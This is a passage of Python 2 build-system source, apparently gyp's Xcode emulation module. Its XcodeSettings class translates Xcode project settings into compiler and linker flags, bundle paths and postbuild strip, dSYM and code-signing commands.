XcodeArchsDefault( '$(ARCHS_STANDARD)', XcodeArchsVariableMapping(['i386']), XcodeArchsVariableMapping(['i386']), XcodeArchsVariableMapping(['armv7'])) elif xcode_version < '0510': XCODE_ARCHS_DEFAULT_CACHE = XcodeArchsDefault( '$(ARCHS_STANDARD_INCLUDING_64_BIT)', XcodeArchsVariableMapping(['x86_64'], ['x86_64']), XcodeArchsVariableMapping(['i386'], ['i386', 'x86_64']), XcodeArchsVariableMapping( ['armv7', 'armv7s'], ['armv7', 'armv7s', 'arm64'])) else: XCODE_ARCHS_DEFAULT_CACHE = XcodeArchsDefault( '$(ARCHS_STANDARD)', XcodeArchsVariableMapping(['x86_64'], ['x86_64']), XcodeArchsVariableMapping(['i386', 'x86_64'], ['i386', 'x86_64']), XcodeArchsVariableMapping( ['armv7', 'armv7s', 'arm64'], ['armv7', 'armv7s', 'arm64'])) return XCODE_ARCHS_DEFAULT_CACHE class XcodeSettings(object): """A class that understands the gyp 'xcode_settings' object.""" # Populated lazily by _SdkPath(). Shared by all XcodeSettings, so cached # at class-level for efficiency. _sdk_path_cache = {} _sdk_root_cache = {} # Populated lazily by GetExtraPlistItems(). Shared by all XcodeSettings, so # cached at class-level for efficiency. _plist_cache = {} # Populated lazily by GetIOSPostbuilds. Shared by all XcodeSettings, so # cached at class-level for efficiency. _codesigning_key_cache = {} def __init__(self, spec): self.spec = spec self.isIOS = False # Per-target 'xcode_settings' are pushed down into configs earlier by gyp. # This means self.xcode_settings[config] always contains all settings # for that config -- the per-target settings as well. Settings that are # the same for all configs are implicitly per-target settings. self.xcode_settings = {} configs = spec['configurations'] for configname, config in configs.iteritems(): self.xcode_settings[configname] = config.get('xcode_settings', {}) self._ConvertConditionalKeys(configname) if self.xcode_settings[configname].get('IPHONEOS_DEPLOYMENT_TARGET', None): self.isIOS = True # This is only non-None temporarily during the execution of some methods. self.configname = None # Used by _AdjustLibrary to match .a and .dylib entries in libraries. self.library_re = re.compile(r'^lib([^/]+)\.(a|dylib)$') def _ConvertConditionalKeys(self, configname): """Converts or warns on conditional keys. Xcode supports conditional keys, such as CODE_SIGN_IDENTITY[sdk=iphoneos*]. This is a partial implementation with some keys converted while the rest force a warning.""" settings = self.xcode_settings[configname] conditional_keys = [key for key in settings if key.endswith(']')] for key in conditional_keys: # If you need more, speak up at http://crbug.com/122592 if key.endswith("[sdk=iphoneos*]"): if configname.endswith("iphoneos"): new_key = key.split("[")[0] settings[new_key] = settings[key] else: print 'Warning: Conditional keys not implemented, ignoring:', \ ' '.join(conditional_keys) del settings[key] def _Settings(self): assert self.configname return self.xcode_settings[self.configname] def _Test(self, test_key, cond_key, default): return self._Settings().get(test_key, default) == cond_key def _Appendf(self, lst, test_key, format_str, default=None): if test_key in self._Settings(): lst.append(format_str % str(self._Settings()[test_key])) elif default: lst.append(format_str % str(default)) def _WarnUnimplemented(self, test_key): if test_key in self._Settings(): print 'Warning: Ignoring not yet implemented key "%s".' % test_key def IsBinaryOutputFormat(self, configname): default = "binary" if self.isIOS else "xml" format = self.xcode_settings[configname].get('INFOPLIST_OUTPUT_FORMAT', default) return format == "binary" def _IsBundle(self): return int(self.spec.get('mac_bundle', 0)) != 0 def _IsIosAppExtension(self): return int(self.spec.get('ios_app_extension', 0)) != 0 def _IsIosWatchKitExtension(self): return int(self.spec.get('ios_watchkit_extension', 0)) != 0 def _IsIosWatchApp(self): return int(self.spec.get('ios_watch_app', 0)) != 0 def GetFrameworkVersion(self): """Returns the framework version of the current target. Only valid for bundles.""" assert self._IsBundle() return self.GetPerTargetSetting('FRAMEWORK_VERSION', default='A') def GetWrapperExtension(self): """Returns the bundle extension (.app, .framework, .plugin, etc). Only valid for bundles.""" assert self._IsBundle() if self.spec['type'] in ('loadable_module', 'shared_library'): default_wrapper_extension = { 'loadable_module': 'bundle', 'shared_library': 'framework', }[self.spec['type']] wrapper_extension = self.GetPerTargetSetting( 'WRAPPER_EXTENSION', default=default_wrapper_extension) return '.' + self.spec.get('product_extension', wrapper_extension) elif self.spec['type'] == 'executable': if self._IsIosAppExtension() or self._IsIosWatchKitExtension(): return '.' + self.spec.get('product_extension', 'appex') else: return '.' + self.spec.get('product_extension', 'app') else: assert False, "Don't know extension for '%s', target '%s'" % ( self.spec['type'], self.spec['target_name']) def GetProductName(self): """Returns PRODUCT_NAME.""" return self.spec.get('product_name', self.spec['target_name']) def GetFullProductName(self): """Returns FULL_PRODUCT_NAME.""" if self._IsBundle(): return self.GetWrapperName() else: return self._GetStandaloneBinaryPath() def GetWrapperName(self): """Returns the directory name of the bundle represented by this target. Only valid for bundles.""" assert self._IsBundle() return self.GetProductName() + self.GetWrapperExtension() def GetBundleContentsFolderPath(self): """Returns the qualified path to the bundle's contents folder. E.g. Chromium.app/Contents or Foo.bundle/Versions/A. Only valid for bundles.""" if self.isIOS: return self.GetWrapperName() assert self._IsBundle() if self.spec['type'] == 'shared_library': return os.path.join( self.GetWrapperName(), 'Versions', self.GetFrameworkVersion()) else: # loadable_modules have a 'Contents' folder like executables. return os.path.join(self.GetWrapperName(), 'Contents') def GetBundleResourceFolder(self): """Returns the qualified path to the bundle's resource folder. E.g. Chromium.app/Contents/Resources. Only valid for bundles.""" assert self._IsBundle() if self.isIOS: return self.GetBundleContentsFolderPath() return os.path.join(self.GetBundleContentsFolderPath(), 'Resources') def GetBundlePlistPath(self): """Returns the qualified path to the bundle's plist file. E.g. Chromium.app/Contents/Info.plist. Only valid for bundles.""" assert self._IsBundle() if self.spec['type'] in ('executable', 'loadable_module'): return os.path.join(self.GetBundleContentsFolderPath(), 'Info.plist') else: return os.path.join(self.GetBundleContentsFolderPath(), 'Resources', 'Info.plist') def GetProductType(self): """Returns the PRODUCT_TYPE of this target.""" if self._IsIosAppExtension(): assert self._IsBundle(), ('ios_app_extension flag requires mac_bundle ' '(target %s)' % self.spec['target_name']) return 'com.apple.product-type.app-extension' if self._IsIosWatchKitExtension(): assert self._IsBundle(), ('ios_watchkit_extension flag requires ' 'mac_bundle (target %s)' % self.spec['target_name']) return 'com.apple.product-type.watchkit-extension' if self._IsIosWatchApp(): assert self._IsBundle(), ('ios_watch_app flag requires mac_bundle ' '(target %s)' % self.spec['target_name']) return 'com.apple.product-type.application.watchapp' if self._IsBundle(): return { 'executable': 'com.apple.product-type.application', 'loadable_module': 'com.apple.product-type.bundle', 'shared_library': 'com.apple.product-type.framework', }[self.spec['type']] else: return { 'executable': 'com.apple.product-type.tool', 'loadable_module': 'com.apple.product-type.library.dynamic', 'shared_library': 'com.apple.product-type.library.dynamic', 'static_library': 'com.apple.product-type.library.static', }[self.spec['type']] def GetMachOType(self): """Returns the MACH_O_TYPE of this target.""" # Weird, but matches Xcode. if not self._IsBundle() and self.spec['type'] == 'executable': return '' return { 'executable': 'mh_execute', 'static_library': 'staticlib', 'shared_library': 'mh_dylib', 'loadable_module': 'mh_bundle', }[self.spec['type']] def _GetBundleBinaryPath(self): """Returns the name of the bundle binary of by this target. E.g. Chromium.app/Contents/MacOS/Chromium. Only valid for bundles.""" assert self._IsBundle() if self.spec['type'] in ('shared_library') or self.isIOS: path = self.GetBundleContentsFolderPath() elif self.spec['type'] in ('executable', 'loadable_module'): path = os.path.join(self.GetBundleContentsFolderPath(), 'MacOS') return os.path.join(path, self.GetExecutableName()) def _GetStandaloneExecutableSuffix(self): if 'product_extension' in self.spec: return '.' + self.spec['product_extension'] return { 'executable': '', 'static_library': '.a', 'shared_library': '.dylib', 'loadable_module': '.so', }[self.spec['type']] def _GetStandaloneExecutablePrefix(self): return self.spec.get('product_prefix', { 'executable': '', 'static_library': 'lib', 'shared_library': 'lib', # Non-bundled loadable_modules are called foo.so for some reason # (that is, .so and no prefix) with the xcode build -- match that. 'loadable_module': '', }[self.spec['type']]) def _GetStandaloneBinaryPath(self): """Returns the name of the non-bundle binary represented by this target. E.g. hello_world. Only valid for non-bundles.""" assert not self._IsBundle() assert self.spec['type'] in ( 'executable', 'shared_library', 'static_library', 'loadable_module'), ( 'Unexpected type %s' % self.spec['type']) target = self.spec['target_name'] if self.spec['type'] == 'static_library': if target[:3] == 'lib': target = target[3:] elif self.spec['type'] in ('loadable_module', 'shared_library'): if target[:3] == 'lib': target = target[3:] target_prefix = self._GetStandaloneExecutablePrefix() target = self.spec.get('product_name', target) target_ext = self._GetStandaloneExecutableSuffix() return target_prefix + target + target_ext def GetExecutableName(self): """Returns the executable name of the bundle represented by this target. E.g. Chromium.""" if self._IsBundle(): return self.spec.get('product_name', self.spec['target_name']) else: return self._GetStandaloneBinaryPath() def GetExecutablePath(self): """Returns the directory name of the bundle represented by this target. E.g. Chromium.app/Contents/MacOS/Chromium.""" if self._IsBundle(): return self._GetBundleBinaryPath() else: return self._GetStandaloneBinaryPath() def GetActiveArchs(self, configname): """Returns the architectures this target should be built for.""" config_settings = self.xcode_settings[configname] xcode_archs_default = GetXcodeArchsDefault() return xcode_archs_default.ActiveArchs( config_settings.get('ARCHS'), config_settings.get('VALID_ARCHS'), config_settings.get('SDKROOT')) def _GetSdkVersionInfoItem(self, sdk, infoitem): # xcodebuild requires Xcode and can't run on Command Line Tools-only # systems from 10.7 onward. # Since the CLT has no SDK paths anyway, returning None is the # most sensible route and should still do the right thing. try: return GetStdout(['xcodebuild', '-version', '-sdk', sdk, infoitem]) except: pass def _SdkRoot(self, configname): if configname is None: configname = self.configname return self.GetPerConfigSetting('SDKROOT', configname, default='') def _SdkPath(self, configname=None): sdk_root = self._SdkRoot(configname) if sdk_root.startswith('/'): return sdk_root return self._XcodeSdkPath(sdk_root) def _XcodeSdkPath(self, sdk_root): if sdk_root not in XcodeSettings._sdk_path_cache: sdk_path = self._GetSdkVersionInfoItem(sdk_root, 'Path') XcodeSettings._sdk_path_cache[sdk_root] = sdk_path if sdk_root: XcodeSettings._sdk_root_cache[sdk_path] = sdk_root return XcodeSettings._sdk_path_cache[sdk_root] def _AppendPlatformVersionMinFlags(self, lst): self._Appendf(lst, 'MACOSX_DEPLOYMENT_TARGET', '-mmacosx-version-min=%s') if 'IPHONEOS_DEPLOYMENT_TARGET' in self._Settings(): # TODO: Implement this better? sdk_path_basename = os.path.basename(self._SdkPath()) if sdk_path_basename.lower().startswith('iphonesimulator'): self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET', '-mios-simulator-version-min=%s') else: self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET', '-miphoneos-version-min=%s') def GetCflags(self, configname, arch=None): """Returns flags that need to be added to .c, .cc, .m, and .mm compilations.""" # This functions (and the similar ones below) do not offer complete # emulation of all xcode_settings keys. They're implemented on demand. self.configname = configname cflags = [] sdk_root = self._SdkPath() if 'SDKROOT' in self._Settings() and sdk_root: cflags.append('-isysroot %s' % sdk_root) if self._Test('CLANG_WARN_CONSTANT_CONVERSION', 'YES', default='NO'): cflags.append('-Wconstant-conversion') if self._Test('GCC_CHAR_IS_UNSIGNED_CHAR', 'YES', default='NO'): cflags.append('-funsigned-char') if self._Test('GCC_CW_ASM_SYNTAX', 'YES', default='YES'): cflags.append('-fasm-blocks') if 'GCC_DYNAMIC_NO_PIC' in self._Settings(): if self._Settings()['GCC_DYNAMIC_NO_PIC'] == 'YES': cflags.append('-mdynamic-no-pic') else: pass # TODO: In this case, it depends on the target. xcode passes # mdynamic-no-pic by default for executable and possibly static lib # according to mento if self._Test('GCC_ENABLE_PASCAL_STRINGS', 'YES', default='YES'): cflags.append('-mpascal-strings') self._Appendf(cflags, 'GCC_OPTIMIZATION_LEVEL', '-O%s', default='s') if self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES'): dbg_format = self._Settings().get('DEBUG_INFORMATION_FORMAT', 'dwarf') if dbg_format == 'dwarf': cflags.append('-gdwarf-2') elif dbg_format == 'stabs': raise NotImplementedError('stabs debug format is not supported yet.') elif dbg_format == 'dwarf-with-dsym': cflags.append('-gdwarf-2') else: raise NotImplementedError('Unknown debug format %s' % dbg_format) if self._Settings().get('GCC_STRICT_ALIASING') == 'YES': cflags.append('-fstrict-aliasing') elif self._Settings().get('GCC_STRICT_ALIASING') == 'NO': cflags.append('-fno-strict-aliasing') if self._Test('GCC_SYMBOLS_PRIVATE_EXTERN', 'YES', default='NO'): cflags.append('-fvisibility=hidden') if self._Test('GCC_TREAT_WARNINGS_AS_ERRORS', 'YES', default='NO'): cflags.append('-Werror') if self._Test('GCC_WARN_ABOUT_MISSING_NEWLINE', 'YES', default='NO'): cflags.append('-Wnewline-eof') # In Xcode, this is only activated when GCC_COMPILER_VERSION is clang or # llvm-gcc. It also requires a fairly recent libtool, and # if the system clang isn't used, DYLD_LIBRARY_PATH needs to contain the # path to the libLTO.dylib that matches the used clang. if self._Test('LLVM_LTO', 'YES', default='NO'): cflags.append('-flto') self._AppendPlatformVersionMinFlags(cflags) # TODO: if self._Test('COPY_PHASE_STRIP', 'YES', default='NO'): self._WarnUnimplemented('COPY_PHASE_STRIP') self._WarnUnimplemented('GCC_DEBUGGING_SYMBOLS') self._WarnUnimplemented('GCC_ENABLE_OBJC_EXCEPTIONS') # TODO: This is exported correctly, but assigning to it is not supported. self._WarnUnimplemented('MACH_O_TYPE') self._WarnUnimplemented('PRODUCT_TYPE') if arch is not None: archs = [arch] else: assert self.configname archs = self.GetActiveArchs(self.configname) if len(archs) != 1: # TODO: Supporting fat binaries will be annoying. self._WarnUnimplemented('ARCHS') archs = ['i386'] cflags.append('-arch ' + archs[0]) if archs[0] in ('i386', 'x86_64'): if self._Test('GCC_ENABLE_SSE3_EXTENSIONS', 'YES', default='NO'): cflags.append('-msse3') if self._Test('GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS', 'YES', default='NO'): cflags.append('-mssse3') # Note 3rd 's'. if self._Test('GCC_ENABLE_SSE41_EXTENSIONS', 'YES', default='NO'): cflags.append('-msse4.1') if self._Test('GCC_ENABLE_SSE42_EXTENSIONS', 'YES', default='NO'): cflags.append('-msse4.2') cflags += self._Settings().get('WARNING_CFLAGS', []) if sdk_root: framework_root = sdk_root else: framework_root = '' config = self.spec['configurations'][self.configname] framework_dirs = config.get('mac_framework_dirs', []) for directory in framework_dirs: cflags.append('-F' + directory.replace('$(SDKROOT)', framework_root)) self.configname = None return cflags def GetCflagsC(self, configname): """Returns flags that need to be added to .c, and .m compilations.""" self.configname = configname cflags_c = [] if self._Settings().get('GCC_C_LANGUAGE_STANDARD', '') == 'ansi': cflags_c.append('-ansi') else: self._Appendf(cflags_c, 'GCC_C_LANGUAGE_STANDARD', '-std=%s') cflags_c += self._Settings().get('OTHER_CFLAGS', []) self.configname = None return cflags_c def GetCflagsCC(self, configname): """Returns flags that need to be added to .cc, and .mm compilations.""" self.configname = configname cflags_cc = [] clang_cxx_language_standard = self._Settings().get( 'CLANG_CXX_LANGUAGE_STANDARD') # Note: Don't make c++0x to c++11 so that c++0x can be used with older # clangs that don't understand c++11 yet (like Xcode 4.2's). if clang_cxx_language_standard: cflags_cc.append('-std=%s' % clang_cxx_language_standard) self._Appendf(cflags_cc, 'CLANG_CXX_LIBRARY', '-stdlib=%s') if self._Test('GCC_ENABLE_CPP_RTTI', 'NO', default='YES'): cflags_cc.append('-fno-rtti') if self._Test('GCC_ENABLE_CPP_EXCEPTIONS', 'NO', default='YES'): cflags_cc.append('-fno-exceptions') if self._Test('GCC_INLINES_ARE_PRIVATE_EXTERN', 'YES', default='NO'): cflags_cc.append('-fvisibility-inlines-hidden') if self._Test('GCC_THREADSAFE_STATICS', 'NO', default='YES'): cflags_cc.append('-fno-threadsafe-statics') # Note: This flag is a no-op for clang, it only has an effect for gcc. if self._Test('GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO', 'NO', default='YES'): cflags_cc.append('-Wno-invalid-offsetof') other_ccflags = [] for flag in self._Settings().get('OTHER_CPLUSPLUSFLAGS', ['$(inherited)']): # TODO: More general variable expansion. Missing in many other places too. if flag in ('$inherited', '$(inherited)', '${inherited}'): flag = '$OTHER_CFLAGS' if flag in ('$OTHER_CFLAGS', '$(OTHER_CFLAGS)', '${OTHER_CFLAGS}'): other_ccflags += self._Settings().get('OTHER_CFLAGS', []) else: other_ccflags.append(flag) cflags_cc += other_ccflags self.configname = None return cflags_cc def _AddObjectiveCGarbageCollectionFlags(self, flags): gc_policy = self._Settings().get('GCC_ENABLE_OBJC_GC', 'unsupported') if gc_policy == 'supported': flags.append('-fobjc-gc') elif gc_policy == 'required': flags.append('-fobjc-gc-only') def _AddObjectiveCARCFlags(self, flags): if self._Test('CLANG_ENABLE_OBJC_ARC', 'YES', default='NO'): flags.append('-fobjc-arc') def _AddObjectiveCMissingPropertySynthesisFlags(self, flags): if self._Test('CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS', 'YES', default='NO'): flags.append('-Wobjc-missing-property-synthesis') def GetCflagsObjC(self, configname): """Returns flags that need to be added to .m compilations.""" self.configname = configname cflags_objc = [] self._AddObjectiveCGarbageCollectionFlags(cflags_objc) self._AddObjectiveCARCFlags(cflags_objc) self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objc) self.configname = None return cflags_objc def GetCflagsObjCC(self, configname): """Returns flags that need to be added to .mm compilations.""" self.configname = configname cflags_objcc = [] self._AddObjectiveCGarbageCollectionFlags(cflags_objcc) self._AddObjectiveCARCFlags(cflags_objcc) self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objcc) if self._Test('GCC_OBJC_CALL_CXX_CDTORS', 'YES', default='NO'): cflags_objcc.append('-fobjc-call-cxx-cdtors') self.configname = None return cflags_objcc def GetInstallNameBase(self): """Return DYLIB_INSTALL_NAME_BASE for this target.""" # Xcode sets this for shared_libraries, and for nonbundled loadable_modules. if (self.spec['type'] != 'shared_library' and (self.spec['type'] != 'loadable_module' or self._IsBundle())): return None install_base = self.GetPerTargetSetting( 'DYLIB_INSTALL_NAME_BASE', default='/Library/Frameworks' if self._IsBundle() else '/usr/local/lib') return install_base def _StandardizePath(self, path): """Do :standardizepath processing for path.""" # I'm not quite sure what :standardizepath does. Just call normpath(), # but don't let @executable_path/../foo collapse to foo. if '/' in path: prefix, rest = '', path if path.startswith('@'): prefix, rest = path.split('/', 1) rest = os.path.normpath(rest) # :standardizepath path = os.path.join(prefix, rest) return path def GetInstallName(self): """Return LD_DYLIB_INSTALL_NAME for this target.""" # Xcode sets this for shared_libraries, and for nonbundled loadable_modules. if (self.spec['type'] != 'shared_library' and (self.spec['type'] != 'loadable_module' or self._IsBundle())): return None default_install_name = \ '$(DYLIB_INSTALL_NAME_BASE:standardizepath)/$(EXECUTABLE_PATH)' install_name = self.GetPerTargetSetting( 'LD_DYLIB_INSTALL_NAME', default=default_install_name) # Hardcode support for the variables used in chromium for now, to # unblock people using the make build. if '$' in install_name: assert install_name in ('$(DYLIB_INSTALL_NAME_BASE:standardizepath)/' '$(WRAPPER_NAME)/$(PRODUCT_NAME)', default_install_name), ( 'Variables in LD_DYLIB_INSTALL_NAME are not generally supported ' 'yet in target \'%s\' (got \'%s\')' % (self.spec['target_name'], install_name)) install_name = install_name.replace( '$(DYLIB_INSTALL_NAME_BASE:standardizepath)', self._StandardizePath(self.GetInstallNameBase())) if self._IsBundle(): # These are only valid for bundles, hence the |if|. install_name = install_name.replace( '$(WRAPPER_NAME)', self.GetWrapperName()) install_name = install_name.replace( '$(PRODUCT_NAME)', self.GetProductName()) else: assert '$(WRAPPER_NAME)' not in install_name assert '$(PRODUCT_NAME)' not in install_name install_name = install_name.replace( '$(EXECUTABLE_PATH)', self.GetExecutablePath()) return install_name def _MapLinkerFlagFilename(self, ldflag, gyp_to_build_path): """Checks if ldflag contains a filename and if so remaps it from gyp-directory-relative to build-directory-relative.""" # This list is expanded on demand. # They get matched as: # -exported_symbols_list file # -Wl,exported_symbols_list file # -Wl,exported_symbols_list,file LINKER_FILE = r'(\S+)' WORD = r'\S+' linker_flags = [ ['-exported_symbols_list', LINKER_FILE], # Needed for NaCl. ['-unexported_symbols_list', LINKER_FILE], ['-reexported_symbols_list', LINKER_FILE], ['-sectcreate', WORD, WORD, LINKER_FILE], # Needed for remoting. ] for flag_pattern in linker_flags: regex = re.compile('(?:-Wl,)?' + '[ ,]'.join(flag_pattern)) m = regex.match(ldflag) if m: ldflag = ldflag[:m.start(1)] + gyp_to_build_path(m.group(1)) + \ ldflag[m.end(1):] # Required for ffmpeg (no idea why they don't use LIBRARY_SEARCH_PATHS, # TODO(thakis): Update ffmpeg.gyp): if ldflag.startswith('-L'): ldflag = '-L' + gyp_to_build_path(ldflag[len('-L'):]) return ldflag def GetLdflags(self, configname, product_dir, gyp_to_build_path, arch=None): """Returns flags that need to be passed to the linker. Args: configname: The name of the configuration to get ld flags for. product_dir: The directory where products such static and dynamic libraries are placed. This is added to the library search path. gyp_to_build_path: A function that converts paths relative to the current gyp file to paths relative to the build direcotry. """ self.configname = configname ldflags = [] # The xcode build is relative to a gyp file's directory, and OTHER_LDFLAGS # can contain entries that depend on this. Explicitly absolutify these. for ldflag in self._Settings().get('OTHER_LDFLAGS', []): ldflags.append(self._MapLinkerFlagFilename(ldflag, gyp_to_build_path)) if self._Test('DEAD_CODE_STRIPPING', 'YES', default='NO'): ldflags.append('-Wl,-dead_strip') if self._Test('PREBINDING', 'YES', default='NO'): ldflags.append('-Wl,-prebind') self._Appendf( ldflags, 'DYLIB_COMPATIBILITY_VERSION', '-compatibility_version %s') self._Appendf( ldflags, 'DYLIB_CURRENT_VERSION', '-current_version %s') self._AppendPlatformVersionMinFlags(ldflags) if 'SDKROOT' in self._Settings() and self._SdkPath(): ldflags.append('-isysroot ' + self._SdkPath()) for library_path in self._Settings().get('LIBRARY_SEARCH_PATHS', []): ldflags.append('-L' + gyp_to_build_path(library_path)) if 'ORDER_FILE' in self._Settings(): ldflags.append('-Wl,-order_file ' + '-Wl,' + gyp_to_build_path( self._Settings()['ORDER_FILE'])) if arch is not None: archs = [arch] else: assert self.configname archs = self.GetActiveArchs(self.configname) if len(archs) != 1: # TODO: Supporting fat binaries will be annoying. self._WarnUnimplemented('ARCHS') archs = ['i386'] ldflags.append('-arch ' + archs[0]) # Xcode adds the product directory by default. ldflags.append('-L' + product_dir) install_name = self.GetInstallName() if install_name and self.spec['type'] != 'loadable_module': ldflags.append('-install_name ' + install_name.replace(' ', r'\ ')) for rpath in self._Settings().get('LD_RUNPATH_SEARCH_PATHS', []): ldflags.append('-Wl,-rpath,' + rpath) sdk_root = self._SdkPath() if not sdk_root: sdk_root = '' config = self.spec['configurations'][self.configname] framework_dirs = config.get('mac_framework_dirs', []) for directory in framework_dirs: ldflags.append('-F' + directory.replace('$(SDKROOT)', sdk_root)) is_extension = self._IsIosAppExtension() or self._IsIosWatchKitExtension() if sdk_root and is_extension: # Adds the link flags for extensions. These flags are common for all # extensions and provide loader and main function. # These flags reflect the compilation options used by xcode to compile # extensions. ldflags.append('-lpkstart') if XcodeVersion() < '0900': ldflags.append(sdk_root + '/System/Library/PrivateFrameworks/PlugInKit.framework/PlugInKit') ldflags.append('-fapplication-extension') ldflags.append('-Xlinker -rpath ' '-Xlinker @executable_path/../../Frameworks') self._Appendf(ldflags, 'CLANG_CXX_LIBRARY', '-stdlib=%s') self.configname = None return ldflags def GetLibtoolflags(self, configname): """Returns flags that need to be passed to the static linker. Args: configname: The name of the configuration to get ld flags for. """ self.configname = configname libtoolflags = [] for libtoolflag in self._Settings().get('OTHER_LDFLAGS', []): libtoolflags.append(libtoolflag) # TODO(thakis): ARCHS? self.configname = None return libtoolflags def GetPerTargetSettings(self): """Gets a list of all the per-target settings. This will only fetch keys whose values are the same across all configurations.""" first_pass = True result = {} for configname in sorted(self.xcode_settings.keys()): if first_pass: result = dict(self.xcode_settings[configname]) first_pass = False else: for key, value in self.xcode_settings[configname].iteritems(): if key not in result: continue elif result[key] != value: del result[key] return result def GetPerConfigSetting(self, setting, configname, default=None): if configname in self.xcode_settings: return self.xcode_settings[configname].get(setting, default) else: return self.GetPerTargetSetting(setting, default) def GetPerTargetSetting(self, setting, default=None): """Tries to get xcode_settings.setting from spec. Assumes that the setting has the same value in all configurations and throws otherwise.""" is_first_pass = True result = None for configname in sorted(self.xcode_settings.keys()): if is_first_pass: result = self.xcode_settings[configname].get(setting, None) is_first_pass = False else: assert result == self.xcode_settings[configname].get(setting, None), ( "Expected per-target setting for '%s', got per-config setting " "(target %s)" % (setting, self.spec['target_name'])) if result is None: return default return result def _GetStripPostbuilds(self, configname, output_binary, quiet): """Returns a list of shell commands that contain the shell commands neccessary to strip this target's binary. These should be run as postbuilds before the actual postbuilds run.""" self.configname = configname result = [] if (self._Test('DEPLOYMENT_POSTPROCESSING', 'YES', default='NO') and self._Test('STRIP_INSTALLED_PRODUCT', 'YES', default='NO')): default_strip_style = 'debugging' if self.spec['type'] == 'loadable_module' and self._IsBundle(): default_strip_style = 'non-global' elif self.spec['type'] == 'executable': default_strip_style = 'all' strip_style = self._Settings().get('STRIP_STYLE', default_strip_style) strip_flags = { 'all': '', 'non-global': '-x', 'debugging': '-S', }[strip_style] explicit_strip_flags = self._Settings().get('STRIPFLAGS', '') if explicit_strip_flags: strip_flags += ' ' + _NormalizeEnvVarReferences(explicit_strip_flags) if not quiet: result.append('echo STRIP\\(%s\\)' % self.spec['target_name']) result.append('strip %s %s' % (strip_flags, output_binary)) self.configname = None return result def _GetDebugInfoPostbuilds(self, configname, output, output_binary, quiet): """Returns a list of shell commands that contain the shell commands neccessary to massage this target's debug information. These should be run as postbuilds before the actual postbuilds run.""" self.configname = configname # For static libraries, no dSYMs are created. result = [] if (self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES') and self._Test( 'DEBUG_INFORMATION_FORMAT', 'dwarf-with-dsym', default='dwarf') and self.spec['type'] != 'static_library'): if not quiet: result.append('echo DSYMUTIL\\(%s\\)' % self.spec['target_name']) result.append('dsymutil %s -o %s' % (output_binary, output + '.dSYM')) self.configname = None return result def _GetTargetPostbuilds(self, configname, output, output_binary, quiet=False): """Returns a list of shell commands that contain the shell commands to run as postbuilds for this target, before the actual postbuilds.""" # dSYMs need to build before stripping happens. return ( self._GetDebugInfoPostbuilds(configname, output, output_binary, quiet) + self._GetStripPostbuilds(configname, output_binary, quiet)) def _GetIOSPostbuilds(self, configname, output_binary): """Return a shell command to codesign the iOS output binary so it can be deployed to a device. This should be run as the very last step of the build.""" if not (self.isIOS and self.spec['type'] == 'executable'): return [] settings = self.xcode_settings[configname] key = self._GetIOSCodeSignIdentityKey(settings) if not key: return [] # Warn for any unimplemented signing xcode keys. unimpl = ['OTHER_CODE_SIGN_FLAGS'] unimpl = set(unimpl) & set(self.xcode_settings[configname].keys()) if unimpl: print 'Warning: Some codesign keys not implemented, ignoring: %s' % ( ', '.join(sorted(unimpl))) return ['%s code-sign-bundle "%s" "%s" "%s" "%s"' % ( os.path.join('${TARGET_BUILD_DIR}', 'gyp-mac-tool'), key, settings.get('CODE_SIGN_RESOURCE_RULES_PATH', ''), settings.get('CODE_SIGN_ENTITLEMENTS', ''), settings.get('PROVISIONING_PROFILE', '')) ] def _GetIOSCodeSignIdentityKey(self, settings): identity = settings.get('CODE_SIGN_IDENTITY') if not identity: return None if identity not in XcodeSettings._codesigning_key_cache: output = subprocess.check_output( ['security', 'find-identity', '-p', 'codesigning', '-v']) for line in output.splitlines(): if identity in line: fingerprint = line.split()[1] cache = XcodeSettings._codesigning_key_cache assert identity not in cache or fingerprint == cache[identity], ( "Multiple codesigning fingerprints for identity: %s" % identity) XcodeSettings._codesigning_key_cache[identity] = fingerprint return XcodeSettings._codesigning_key_cache.get(identity, '') def AddImplicitPostbuilds(self, configname, output, output_binary, postbuilds=[], quiet=False): """Returns a list of shell commands that should run before and after |postbuilds|.""" assert output_binary is not None pre = self._GetTargetPostbuilds(configname, output, output_binary, quiet) post = self._GetIOSPostbuilds(configname, output_binary) return pre + postbuilds + post def _AdjustLibrary(self, library, config_name=None): if library.endswith('.framework'): l = '-framework ' + os.path.splitext(os.path.basename(library))[0] else: m = self.library_re.match(library) if m: l = '-l' + m.group(1) else: l = library sdk_root = self._SdkPath(config_name) if not sdk_root: sdk_root = '' # Xcode 7 started shipping with ".tbd" (text based stubs) files instead of # ".dylib" without providing a real support for them. What it does, for # "/usr/lib" libraries, is do "-L/usr/lib -lname" which is dependent on the # library order and cause collision when building Chrome. # # Instead substitude ".tbd" to ".dylib" in the generated project when the # following conditions are both true: # - library is referenced in the gyp file as "$(SDKROOT)/**/*.dylib", # - the ".dylib" file does not exists but a ".tbd" file do. library = l.replace('$(SDKROOT)', sdk_root) if l.startswith('$(SDKROOT)'): basename, ext = os.path.splitext(library) if ext == '.dylib' and not os.path.exists(library): tbd_library = basename + '.tbd' if os.path.exists(tbd_library): library = tbd_library return library def AdjustLibraries(self, libraries, config_name=None): """Transforms entries like 'Cocoa.framework' in libraries into entries like '-framework Cocoa', 'libcrypto.dylib' into '-lcrypto', etc. """ libraries = [self._AdjustLibrary(library, config_name) for library in libraries] return libraries def _BuildMachineOSBuild(self): return GetStdout(['sw_vers', '-buildVersion']) def _XcodeIOSDeviceFamily(self, configname): family = self.xcode_settings[configname].get('TARGETED_DEVICE_FAMILY', '1') return [int(x) for x in family.split(',')] def GetExtraPlistItems(self, configname=None): """Returns a dictionary with extra items to insert into Info.plist.""" if configname not in XcodeSettings._plist_cache: cache = {} cache['BuildMachineOSBuild'] = self._BuildMachineOSBuild() xcode, xcode_build = XcodeVersion() cache['DTXcode'] = xcode cache['DTXcodeBuild'] = xcode_build sdk_root = self._SdkRoot(configname) if not sdk_root: sdk_root = self._DefaultSdkRoot() cache['DTSDKName'] = sdk_root if xcode >= '0430': cache['DTSDKBuild'] = self._GetSdkVersionInfoItem( 